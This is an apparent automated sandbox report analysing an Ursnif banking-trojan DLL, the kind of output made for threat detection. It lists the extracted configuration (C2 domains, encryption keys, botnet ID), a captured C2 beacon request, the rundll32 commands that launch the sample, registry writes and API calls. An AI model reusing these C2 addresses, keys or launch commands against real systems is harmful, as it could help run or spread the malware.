{"lang_id": "RU, CN", "RSA Public Key": "oUnY8+/8G/QjijBEa03/PDDCyhbZrtKtx8eYSXLSbmKpR2omzPKPDVDiaj+dBCVC5Sp5s16D5EsjkO+S9MLdqEPK+/EAZI0qxYwv0GmWkXSlJi4jyYyJKc5a5Nek5/cWbmHSXPW+Rq2S8QAD5SioqB8j4ScC8nSuqcxPZwTdEUXuTG36kAdjIfamPdH5DlrmzxdodFTkShIE2IKM5O/dCTIwhTSQIj7YF2w9akzONLDoXT8cJE2CEp0UrlGkTtCcRTWQr67rMF2nSqm+ctweTZRfgBKtrDgiEDrXnhmUscy59twRBz1A7dRDpJryotUEkXjZHrb6gv4q0NjsbeCK4Jw4zYJf7CO+eANF3Bou0fo=", "c2_domain": ["authd.feronok.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "jT7xNsiVSW2IugIq", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
Source: http://authd.feronok.com/INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq | Avira URL Cloud: Label: malware |
Source: http://authd.feronok.com/INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq39/C9yL3XEqjGdzvV/F4wrCEliEtubK_2BQN3v0/mpD0sYBWj1_2BOoZ/MhYNZMroasOcyRm/Y7cgiiYGTmIYClS1bt/R_2BrGpes/V0WKbm6yczDyoBvOW06Z/_2FVUJ_2BtBEMJQ2mZ0/eqMRxCIXxJwUIjVA7qTLlE/f_2FwC5tmUPbh/r76jmp6x/obp7g2x_2BpjxmD9q5fMhKl/Y1cOMUM_2F/x9ahGBENuH7csdR7_/2FySnpeWZizz/XD203nXIqoX/COsoX4qlT56/jcBfJkpo | Avira URL Cloud: Label: malware |
Source: 00000005.00000003.323666044.0000000002AB0000.00000040.00000001.sdmp | Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "oUnY8+/8G/QjijBEa03/PDDCyhbZrtKtx8eYSXLSbmKpR2omzPKPDVDiaj+dBCVC5Sp5s16D5EsjkO+S9MLdqEPK+/EAZI0qxYwv0GmWkXSlJi4jyYyJKc5a5Nek5/cWbmHSXPW+Rq2S8QAD5SioqB8j4ScC8nSuqcxPZwTdEUXuTG36kAdjIfamPdH5DlrmzxdodFTkShIE2IKM5O/dCTIwhTSQIj7YF2w9akzONLDoXT8cJE2CEp0UrlGkTtCcRTWQr67rMF2nSqm+ctweTZRfgBKtrDgiEDrXnhmUscy59twRBz1A7dRDpJryotUEkXjZHrb6gv4q0NjsbeCK4Jw4zYJf7CO+eANF3Bou0fo=", "c2_domain": ["authd.feronok.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "jT7xNsiVSW2IugIq", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"} |
Source: SecuriteInfo.com..7135.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
Source: SecuriteInfo.com..7135.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT |
Source: | Binary string: c:\571\bar\Nature\industry\Son.pdb source: loaddll32.exe, rundll32.exe, SecuriteInfo.com..7135.dll |
Source: global traffic | HTTP traffic detected: GET /INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq39/C9yL3XEqjGdzvV/F4wrCEliEtubK_2BQN3v0/mpD0sYBWj1_2BOoZ/MhYNZMroasOcyRm/Y7cgiiYGTmIYClS1bt/R_2BrGpes/V0WKbm6yczDyoBvOW06Z/_2FVUJ_2BtBEMJQ2mZ0/eqMRxCIXxJwUIjVA7qTLlE/f_2FwC5tmUPbh/r76jmp6x/obp7g2x_2BpjxmD9q5fMhKl/Y1cOMUM_2F/x9ahGBENuH7csdR7_/2FySnpeWZizz/XD203nXIqoX/COsoX4qlT56/jcBfJkpo HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: authd.feronok.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 10 Jun 2021 20:50:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30 |
Source: {FA4B99A6-CA78-11EB-90E4-ECF4BB862DED}.dat.23.dr, ~DF80E1CCC67DA5CD93.TMP.23.dr | String found in binary or memory: http://authd.feronok.com/INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq |
Source: Yara match | File source: 00000004.00000003.430352092.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000002.464198146.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430424986.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430241635.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430313705.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430450163.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430406711.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430285928.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430372927.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5328, type: MEMORY |
Source: loaddll32.exe, 00000000.00000002.460078435.000000000073B000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/> |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1C2485 NtQueryVirtualMemory, | 0_2_6E1C2485 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1C1B9C GetProcAddress,NtCreateSection,memset, | 4_2_6E1C1B9C |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1C1EC7 NtMapViewOfSection, | 4_2_6E1C1EC7 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1C2485 NtQueryVirtualMemory, | 4_2_6E1C2485 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1C2264 | 0_2_6E1C2264 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E2237EA | 0_2_6E2237EA |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E23F1F0 | 0_2_6E23F1F0 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E23D7C5 | 0_2_6E23D7C5 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E23DFD2 | 0_2_6E23DFD2 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E224510 | 0_2_6E224510 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E291D40 | 0_2_6E291D40 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E237200 | 0_2_6E237200 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E23A216 | 0_2_6E23A216 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E221010 | 0_2_6E221010 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E2308E5 | 0_2_6E2308E5 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E22A9D3 | 0_2_6E22A9D3 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1C2264 | 4_2_6E1C2264 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E2237EA | 4_2_6E2237EA |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E23F1F0 | 4_2_6E23F1F0 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E23D7C5 | 4_2_6E23D7C5 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E23DFD2 | 4_2_6E23DFD2 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E224510 | 4_2_6E224510 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E291D40 | 4_2_6E291D40 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E237200 | 4_2_6E237200 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E23A216 | 4_2_6E23A216 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E221010 | 4_2_6E221010 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E2308E5 | 4_2_6E2308E5 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E22A9D3 | 4_2_6E22A9D3 |
Source: C:\Windows\System32\loaddll32.exe | Code function: String function: 6E220F70 appears 31 times |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 6E220F70 appears 31 times |
Source: SecuriteInfo.com..7135.dll | Binary or memory string: OriginalFilenameSon.dll8 vs SecuriteInfo.com..7135.dll |
Source: classification engine | Classification label: mal76.troj.winDLL@12/13@1/1 |
Source: SecuriteInfo.com..7135.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,Paragraphbell |
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll' |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1 |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1 |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,Sharptwo |
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding |
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4456 CREDAT:17410 /prefetch:2 |
Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK |
Source: SecuriteInfo.com..7135.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT |
Source: SecuriteInfo.com..7135.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE |
Source: SecuriteInfo.com..7135.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC |
Source: SecuriteInfo.com..7135.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: SecuriteInfo.com..7135.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG |
Source: SecuriteInfo.com..7135.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1C2200 push ecx; ret | 0_2_6E1C2209 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1C2253 push ecx; ret | 0_2_6E1C2263 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E220FB5 push ecx; ret | 0_2_6E220FC8 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1D0B16 pushad ; iretd | 0_2_6E1D0B17 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1CEBB5 pushfd ; iretd | 0_2_6E1CEC0C |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1D2807 pushad ; retf | 0_2_6E1D2809 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1D10D4 push 04853024h; retf | 0_2_6E1D10DB |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1C2200 push ecx; ret | 4_2_6E1C2209 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1C2253 push ecx; ret | 4_2_6E1C2263 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E220FB5 push ecx; ret | 4_2_6E220FC8 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1D0B16 pushad ; iretd | 4_2_6E1D0B17 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1CEBB5 pushfd ; iretd | 4_2_6E1CEC0C |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1D2807 pushad ; retf | 4_2_6E1D2809 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1D10D4 push 04853024h; retf | 4_2_6E1D10DB |
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\loaddll32.exe | Last function: Thread delayed |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E238402 ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer, | 0_2_6E238402 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E297188 mov eax, dword ptr fs:[00000030h] | 0_2_6E297188 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E2970BE mov eax, dword ptr fs:[00000030h] | 0_2_6E2970BE |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E296CC5 push dword ptr fs:[00000030h] | 0_2_6E296CC5 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E297188 mov eax, dword ptr fs:[00000030h] | 4_2_6E297188 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E2970BE mov eax, dword ptr fs:[00000030h] | 4_2_6E2970BE |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E296CC5 push dword ptr fs:[00000030h] | 4_2_6E296CC5 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E225EA1 SetUnhandledExceptionFilter, | 0_2_6E225EA1 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E225ED2 SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_6E225ED2 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E225EA1 SetUnhandledExceptionFilter, | 4_2_6E225EA1 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E225ED2 SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 4_2_6E225ED2 |
Source: loaddll32.exe, 00000000.00000002.460172900.0000000000CD0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.461520126.0000000003680000.00000002.00000001.sdmp | Binary or memory string: Program Manager |
Source: loaddll32.exe, 00000000.00000002.460172900.0000000000CD0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.461520126.0000000003680000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd |
Source: loaddll32.exe, 00000000.00000002.460172900.0000000000CD0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.461520126.0000000003680000.00000002.00000001.sdmp | Binary or memory string: Progman |
Source: loaddll32.exe, 00000000.00000002.460172900.0000000000CD0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.461520126.0000000003680000.00000002.00000001.sdmp | Binary or memory string: Progmanlock |
Source: C:\Windows\System32\loaddll32.exe | Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, | 0_2_6E1C1E8A |
Source: C:\Windows\System32\loaddll32.exe | Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage, | 0_2_6E22E72D |
Source: C:\Windows\System32\loaddll32.exe | Code function: _GetPrimaryLen,EnumSystemLocalesW, | 0_2_6E22E438 |
Source: C:\Windows\System32\loaddll32.exe | Code function: _GetPrimaryLen,EnumSystemLocalesW, | 0_2_6E22E4B5 |
Source: C:\Windows\System32\loaddll32.exe | Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage, | 0_2_6E22E538 |
Source: C:\Windows\System32\loaddll32.exe | Code function: EnumSystemLocalesW, | 0_2_6E22ED13 |
Source: C:\Windows\System32\loaddll32.exe | Code function: GetLocaleInfoW, | 0_2_6E22ED99 |
Source: C:\Windows\System32\loaddll32.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, | 0_2_6E22FA7E |
Source: C:\Windows\System32\loaddll32.exe | Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson, | 0_2_6E223BC0 |
Source: C:\Windows\System32\loaddll32.exe | Code function: EnumSystemLocalesW, | 0_2_6E22E3DC |
Source: C:\Windows\System32\loaddll32.exe | Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP, | 0_2_6E22E857 |
Source: C:\Windows\System32\loaddll32.exe | Code function: GetLocaleInfoW,_GetPrimaryLen, | 0_2_6E22E904 |
Source: C:\Windows\System32\loaddll32.exe | Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW, | 0_2_6E22E168 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, | 4_2_6E1C1E8A |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage, | 4_2_6E22E72D |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _GetPrimaryLen,EnumSystemLocalesW, | 4_2_6E22E438 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _GetPrimaryLen,EnumSystemLocalesW, | 4_2_6E22E4B5 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage, | 4_2_6E22E538 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW, | 4_2_6E22ED13 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW, | 4_2_6E22ED99 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, | 4_2_6E22FA7E |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson, | 4_2_6E223BC0 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW, | 4_2_6E22E3DC |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP, | 4_2_6E22E857 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,_GetPrimaryLen, | 4_2_6E22E904 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW, | 4_2_6E22E168 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1C1C7D SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, | 0_2_6E1C1C7D |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1C1F10 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, | 0_2_6E1C1F10 |